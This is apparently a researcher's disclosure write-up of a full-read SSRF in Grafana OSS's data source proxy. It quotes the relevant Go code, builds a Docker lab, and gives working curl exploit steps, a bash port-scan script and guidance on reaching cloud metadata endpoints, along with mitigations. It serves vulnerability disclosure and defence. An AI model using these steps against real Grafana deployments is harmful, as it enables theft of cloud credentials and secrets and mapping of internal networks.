Grafana OSS - Full Read SSRF via Data Source Proxy
## Abstract
Grafana is the most popular open-source monitoring and observability platform, used by thousands of organizations to visualize metrics, logs, and traces. During security research on the Grafana OSS codebase, I identified a full read Server-Side Request Forgery (SSRF) vulnerability/misconfiguration in the data source proxy. An authenticated user with data source creation permissions can configure a data source pointing to any internal URL, and the proxy returns the complete response body making it trivial to steal cloud metadata credentials, read internal APIs, and map the internal network.
This is possible because of two compounding issues in Grafana OSS: the URL validator is a
no-op that always returns nil, and the data source proxy whitelist
is empty by default, which causes the whitelist check to be completely skipped.
## Is This a Vulnerability or a Misconfiguration?
This is a fair question. The answer is: it's both.
Grafana OSS intentionally ships with a no-op URL validator. The Enterprise version
has actual validation logic. The data source proxy whitelist exists as a configuration
option (data_source_proxy_whitelist) but is empty by default, and the code is
written so that an empty whitelist means allow everything. This is a
design decision, not an accidental bug.
However, this creates a dangerous default: every Grafana OSS instance deployed in a cloud environment (AWS, GCP, Azure) with the default configuration is vulnerable to SSRF from any user that can create data sources. Most organizations deploying Grafana don't know that this whitelist exists or that it needs to be configured. The secure-by-default principle says that the default configuration should be safe, and this one isn't.
Regardless of how you classify it, the impact is real: full read access to internal network services from the Grafana server's network context.
## The Problem in Code
### Problem 1: No-op URL Validator (OSS)
The Grafana OSS build includes a URL validator that does literally nothing. Both the
request validator and the URL validator always return nil:
// pkg/services/validations/oss.go
type OSSDataSourceRequestValidator struct{}
func (*OSSDataSourceRequestValidator) Validate(string, *simplejson.Json, *http.Request) error {
return nil // Always passes - zero validation
}
type OSSDataSourceRequestURLValidator struct{}
func (*OSSDataSourceRequestURLValidator) Validate(string) error {
return nil // Always passes - zero URL validation
}
This is the entire file. There is no IP range check, no hostname check, no protocol check. The Grafana Enterprise build replaces this with actual validation logic, but the OSS version, which is what most people deploy, has nothing.
### Problem 2: Empty Whitelist = Allow Everything
The data source proxy has a whitelist check, but its logic is inverted for the default case:
// pkg/api/pluginproxy/ds_proxy.go:402-411
func (proxy *DataSourceProxy) checkWhiteList() bool {
if proxy.targetUrl.Host != "" && len(proxy.cfg.DataProxyWhiteList) > 0 {
if _, exists := proxy.cfg.DataProxyWhiteList[proxy.targetUrl.Host]; !exists {
proxy.ctx.JsonApiErr(403, "Data proxy hostname and ip are not included in whitelist", nil)
return false
}
}
return true // Empty whitelist = allow everything
}
The whitelist is only enforced when len(proxy.cfg.DataProxyWhiteList) > 0.
When the whitelist is empty (the default), the entire check is skipped and the function
returns true (allowed).
The default configuration in conf/defaults.ini:
# conf/defaults.ini:398-399
# data source proxy whitelist (ip_or_domain:port separated by spaces)
data_source_proxy_whitelist =
Empty. Out of the box, every Grafana OSS instance allows proxying to any host.
### Problem 3: URL Validation Only Checks Format
When creating a data source, the URL goes through ValidateURL(), but this
function only checks that the URL is syntactically valid (has a protocol, parses correctly).
It does not check if the URL points to a private IP range or cloud metadata
endpoint:
// pkg/api/datasource/validation.go:63
func ValidateURL(typeName, urlStr string) (*url.URL, error) {
// Only checks: is URL empty? does it have a protocol? does it parse?
// Does NOT check: is the host a private IP? is it a cloud metadata endpoint?
if !reURL.MatchString(urlStr) {
urlStr = "http://" + urlStr
}
u, err = url.Parse(urlStr)
// ...
return u, nil
}
### The Proxy: Full Reverse Proxy with Response Passthrough
The data source proxy is a full HTTP reverse proxy. It forwards the request and returns the complete response body to the caller:
// pkg/api/pluginproxy/ds_proxy.go:91-162
func (proxy *DataSourceProxy) HandleRequest() {
if err := proxy.validateRequest(); err != nil {
proxy.ctx.JsonApiErr(403, err.Error(), nil)
return
}
// Get transport (no IP validation here either)
transport, err := proxy.dataSourcesService.GetHTTPTransport(...)
// Create reverse proxy - forwards request to target and returns response
reverseProxy := proxyutil.NewReverseProxy(
proxyErrorLogger,
proxy.director,
proxyutil.WithTransport(transport),
proxyutil.WithModifyResponse(modifyResponse),
)
// Serve - full response body is returned to the attacker
reverseProxy.ServeHTTP(proxy.ctx.Resp, proxy.ctx.Req)
}
This is what makes this a full read SSRF, not a blind SSRF. The attacker gets the complete HTTP response from the internal service, including headers and body.
## Prerequisites
- Grafana OSS (any version, the no-op validator has existed since the OSS/Enterprise split)
- Default configuration (
data_source_proxy_whitelistnot set, which is the default) - Admin role (by default) or any user with
datasources:createanddatasources:queryRBAC permissions - The Grafana server must be deployed in a network with internal services reachable (cloud VPC, Kubernetes cluster, Docker network, etc.)
Note on Grafana Enterprise: The Enterprise build has actual URL validators
(OSSDataSourceRequestURLValidator is replaced with a real implementation).
This issue is specific to Grafana OSS.
## Lab Setup
The following Docker Compose lab demonstrates the vulnerability with a simulated internal service containing sensitive data.
### 1. Create the project structure
mkdir grafana-ssrf-lab && cd grafana-ssrf-lab
### 2. Create internal_service.py
This simulates an internal service (cloud metadata endpoint, secret manager, internal API) that contains sensitive data and should only be accessible within the network:
#!/usr/bin/env python3
"""Simulates an internal service with sensitive data (e.g., cloud metadata)"""
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
# Simulate different internal endpoints
if self.path == '/latest/meta-data/iam/security-credentials/grafana-role':
# Simulated AWS IMDSv1 response
data = {
'Code': 'Success',
'Type': 'AWS-HMAC',
'AccessKeyId': 'AKIAIOSFODNN7EXAMPLE',
'SecretAccessKey': 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY',
'Token': 'IQoJb3JpZ2luX2VjEBAaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJ...',
'Expiration': '2026-03-25T00:00:00Z'
}
elif self.path == '/api/v1/secrets/database':
# Simulated internal secret manager
data = {
'secret_name': 'production-database',
'username': 'db_admin',
'password': 'S3cureP@ssw0rd!2026',
'host': 'prod-db.internal:5432',
'database': 'customers'
}
else:
data = {
'service': 'INTERNAL-SECRET-SERVICE',
'path': self.path,
'message': 'THIS DATA SHOULD NOT BE ACCESSIBLE FROM OUTSIDE',
'internal_ip': '10.0.1.50',
'environment': 'production'
}
self.wfile.write(json.dumps(data, indent=2).encode())
def do_POST(self):
content_length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(content_length)
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
print(f'[HIT] POST {self.path}', flush=True)
print(f'[HIT] Body: {body.decode()[:500]}', flush=True)
self.wfile.write(b'{"status": "ok"}')
def log_message(self, format, *args):
print(f'[INTERNAL-SERVICE] {format % args}', flush=True)
if __name__ == '__main__':
print('Internal service listening on port 8080...', flush=True)
HTTPServer(('0.0.0.0', 8080), Handler).serve_forever()
### 3. Create docker-compose.yml
services:
grafana:
image: grafana/grafana-oss:latest
container_name: grafana-lab
ports:
- "3000:3000"
environment:
- GF_SECURITY_ADMIN_USER=admin
- GF_SECURITY_ADMIN_PASSWORD=admin
networks:
- lab-network
depends_on:
- internal-service
internal-service:
image: python:3.12-slim
container_name: internal-service
volumes:
- ./internal_service.py:/app/server.py:ro
command: python3 /app/server.py
networks:
- lab-network
# No ports exposed - only accessible within the Docker network
networks:
lab-network:
driver: bridge
### 4. Start the lab
$ docker compose up -d
[+] Running 3/3
✔ Network grafana-ssrf-lab_lab-network Created
✔ Container internal-service Started
✔ Container grafana-lab Started
### 5. Verify the setup
# Grafana is up
$ curl -s http://localhost:3000/api/health | jq .
{
"commit": "...",
"database": "ok",
"version": "12.4.1"
}
# Internal service is reachable FROM Grafana's network
$ docker exec grafana-lab curl -s http://internal-service:8080/
{
"service": "INTERNAL-SECRET-SERVICE",
"path": "/",
"message": "THIS DATA SHOULD NOT BE ACCESSIBLE FROM OUTSIDE",
...
}
# But NOT reachable from the host machine
$ curl -s --max-time 2 http://internal-service:8080/ 2>&1
curl: (6) Could not resolve host: internal-service
## Exploitation
### Step 1: Create a data source pointing to the internal service
Register a new Prometheus data source with the URL set to the internal service. The data source type doesn't matter much, the proxy will forward any request regardless of type.
$ DS_RESPONSE=$(curl -s -X POST http://localhost:3000/api/datasources \
-u admin:admin \
-H "Content-Type: application/json" \
-d '{
"name": "SSRF-Target",
"type": "prometheus",
"url": "http://internal-service:8080",
"access": "proxy",
"isDefault": false
}')
$ DS_ID=$(echo $DS_RESPONSE | jq -r '.datasource.id // .id')
$ DS_UID=$(echo $DS_RESPONSE | jq -r '.datasource.uid // .uid')
$ echo "Data Source ID: $DS_ID / UID: $DS_UID"
Data Source ID: 2 / UID: fe4k7z1234abc
Grafana accepts this without complaint. The no-op URL validator returns nil,
and the empty whitelist allows everything.
### Step 2: Read internal service data via the proxy
Now use the data source proxy endpoint. The path after /proxy/{id}/ is
appended to the data source URL and the full response body is returned:
# Read the default endpoint
$ curl -s -u admin:admin \
"http://localhost:3000/api/datasources/proxy/$DS_ID/"
{
"service": "INTERNAL-SECRET-SERVICE",
"path": "/",
"message": "THIS DATA SHOULD NOT BE ACCESSIBLE FROM OUTSIDE",
"internal_ip": "10.0.1.50",
"environment": "production"
}
The full response from the internal service is returned to us. We can hit any path on the internal service:
# Simulate AWS IMDSv1 credential theft
$ curl -s -u admin:admin \
"http://localhost:3000/api/datasources/proxy/$DS_ID/latest/meta-data/iam/security-credentials/grafana-role"
{
"Code": "Success",
"Type": "AWS-HMAC",
"AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
"SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
"Token": "IQoJb3JpZ2luX2VjEBAaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJ...",
"Expiration": "2026-03-25T00:00:00Z"
}
# Read internal secret manager
$ curl -s -u admin:admin \
"http://localhost:3000/api/datasources/proxy/$DS_ID/api/v1/secrets/database"
{
"secret_name": "production-database",
"username": "db_admin",
"password": "S3cureP@ssw0rd!2026",
"host": "prod-db.internal:5432",
"database": "customers"
}
### Step 3: Same attack via UID-based endpoint
# Works with UID too
$ curl -s -u admin:admin \
"http://localhost:3000/api/datasources/proxy/uid/$DS_UID/api/v1/secrets/database"
{
"secret_name": "production-database",
"username": "db_admin",
"password": "S3cureP@ssw0rd!2026",
...
}
### Step 4: Internal port scanning
Open ports return the service response (HTTP 200), closed ports return HTTP 502 from the Grafana proxy. This enables internal network mapping:
#!/bin/bash
# port_scan.sh - Scan internal ports via Grafana data source proxy SSRF
TARGET="internal-service"
GRAFANA="http://localhost:3000"
AUTH="admin:admin"
for PORT in 22 80 443 3306 5432 6379 8080 8443 9090 9200 27017; do
# Create a data source for each port
DS_ID=$(curl -s -X POST "$GRAFANA/api/datasources" \
-u "$AUTH" \
-H "Content-Type: application/json" \
-d '{
"name": "scan-'"$PORT"'",
"type": "prometheus",
"url": "http://'"$TARGET"':'"$PORT"'",
"access": "proxy"
}' | jq -r '.datasource.id // .id')
# Probe through the proxy
HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
-u "$AUTH" \
"$GRAFANA/api/datasources/proxy/$DS_ID/" 2>/dev/null)
if [ "$HTTP_CODE" = "200" ]; then
echo "Port $PORT: OPEN (HTTP $HTTP_CODE)"
else
echo "Port $PORT: closed (HTTP $HTTP_CODE)"
fi
# Cleanup
curl -s -X DELETE "$GRAFANA/api/datasources/$DS_ID" -u "$AUTH" > /dev/null
done
$ bash port_scan.sh
Port 22: closed (HTTP 502)
Port 80: closed (HTTP 502)
Port 443: closed (HTTP 502)
Port 3306: closed (HTTP 502)
Port 5432: closed (HTTP 502)
Port 6379: closed (HTTP 502)
Port 8080: OPEN (HTTP 200) <-- internal service found!
Port 8443: closed (HTTP 502)
Port 9090: closed (HTTP 502)
Port 9200: closed (HTTP 502)
Port 27017: closed (HTTP 502)
## Why This is Dangerous
Unlike blind SSRF where the attacker can only observe side-channel information (timing, error messages), this is a full read SSRF. The attacker receives the complete HTTP response from the target service:
| Aspect | Blind SSRF | This (Full Read SSRF) |
|---|---|---|
| Response visible | No | Yes - complete body + headers |
| Data exfiltration | Side-channels only | Direct - full response returned |
| Trigger | Often requires waiting | Instant, on-demand |
| HTTP methods | Usually limited | GET, POST, PUT, DELETE |
| Cloud credential theft | Difficult to extract | Trivial - just read the response |
## Real-World Impact
-
AWS/GCP/Azure credential theft: Create a data source pointing to
http://169.254.169.254(AWS IMDSv1) orhttp://metadata.google.internal(GCP). Read the full IAM credential JSON response including AccessKeyId, SecretAccessKey, and session Token. This leads to full cloud account compromise if the instance role has broad permissions. -
Kubernetes secret access: Point to
https://kubernetes.default.svc/api/v1/namespaces/default/secrets. If the Grafana pod has a service account with permissions, you can read all secrets in the cluster. - Internal API data exfiltration: Read responses from internal REST APIs, databases with HTTP interfaces (Elasticsearch, CouchDB, Consul), and other services that don't require authentication from within the trusted network.
- Internal network mapping: Differentiate open (HTTP 200) from closed (HTTP 502) ports to discover running services and their network topology.
## Affected Versions
- All Grafana OSS versions (the no-op validator has existed since the OSS/Enterprise split)
- Confirmed on Grafana OSS v12.4.1 and current main branch
- Grafana Enterprise is not affected (has actual URL validators)
## Mitigation
If you're running Grafana OSS, you can mitigate this by configuring the data source
proxy whitelist in your grafana.ini / custom.ini:
[security]
# Only allow proxying to these specific hosts
data_source_proxy_whitelist = prometheus.internal:9090 elasticsearch.internal:9200
This forces the whitelist check in checkWhiteList() to actually evaluate
the target host against the allowed list. Any data source URL not matching a whitelisted
host will be rejected with HTTP 403.
For a proper fix in the codebase, Grafana should:
- Implement actual URL validation in
OSSDataSourceRequestURLValidator.Validate()instead of returningnil - Add a
SafeDialerto the data source proxy HTTP transport that blocks private IP ranges (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) and cloud metadata endpoints (169.254.169.254) at the TCP connection level:// Recommended: SafeDialer with IP validation in the transport transport.DialContext = func(ctx context.Context, network, addr string) (net.Conn, error) { host, _, _ := net.SplitHostPort(addr) ip := net.ParseIP(host) if ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() { return nil, fmt.Errorf("blocked: request to private IP %s", ip) } if ip.Equal(net.ParseIP("169.254.169.254")) { return nil, fmt.Errorf("blocked: request to cloud metadata endpoint") } return (&net.Dialer{Timeout: 30 * time.Second}).DialContext(ctx, network, addr) } - Invert the whitelist logic so that an empty whitelist denies all instead of allowing all, or require explicit configuration
- Add a warning in the Grafana UI when a data source URL resolves to a private IP range
## References
- Grafana - Data sources documentation
- Grafana - data_source_proxy_whitelist configuration
- OWASP - Server Side Request Forgery
- OWASP - SSRF Prevention Cheat Sheet
- CWE-918: Server-Side Request Forgery
- Grafana OSS GitHub Repository
- AWS - Instance metadata retrieval